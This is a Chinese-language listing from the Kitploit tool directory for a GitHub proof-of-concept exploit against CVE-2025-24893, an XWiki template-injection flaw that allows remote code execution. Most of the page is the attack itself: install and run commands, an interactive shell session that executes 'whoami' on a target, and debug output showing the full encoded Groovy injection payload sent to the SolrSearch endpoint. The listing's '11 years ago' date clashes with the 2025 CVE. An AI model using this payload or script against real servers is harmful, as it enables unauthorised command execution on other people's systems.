Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-24893-RCE-PoC — 这是一个针对CVE-2025-24893远程代码执行漏洞的小型脚本。它支持基本的输入/输出。 | Kitploit
工具/GitHubGitHub/gmh5225/cve-2025-24893-rce-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubgmh5225/cve-2025-24893-rce-poc

CVE-2025-24893-RCE-PoC

这是一个针对CVE-2025-24893远程代码执行漏洞的小型脚本。它支持基本的输入/输出。

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

信息

此 PoC 首先测试 SSTI 是否有效,如果成功,则会进入循环,允许您远程执行命令。

当前 exec 和 shell 命令功能相同。

安装

root@kitploit:~
python3 -m pip install requirements.txt

用法

连接

root@kitploit:~
python3 poc.py <target>

示例

调试模式设置为 False(默认)

root@kitploit:~
python3 poc.py http://10.129.137.222:8080
[*] Targeting http://10.129.137.222:8080
[+] Target is vulnerable!
(xwiki-shell) > help

Documented commands (type help <topic>):
========================================
exec  exit  help  shell

(xwiki-shell) > exec whoami
xwiki

调试模式设置为 True

脚本顶部的调试标志会显示生成的 URL。 它还会创建一个 debug.log 文件,其中包含请求的原始响应。

root@kitploit:~
python3 poc.py http://10.129.137.222:8080
[*] Targeting http://10.129.137.222:8080
[DEBUG] URL used: http://10.129.137.222:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22XWIKI_TEST_123%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
[+] Target is vulnerable!
(xwiki-shell) > help

Documented commands (type help <topic>):
========================================
exec  exit  help  shell

(xwiki-shell) > exec whoami
[DEBUG] URL used: http://10.129.137.222:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22whoami%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
xwiki
下载工具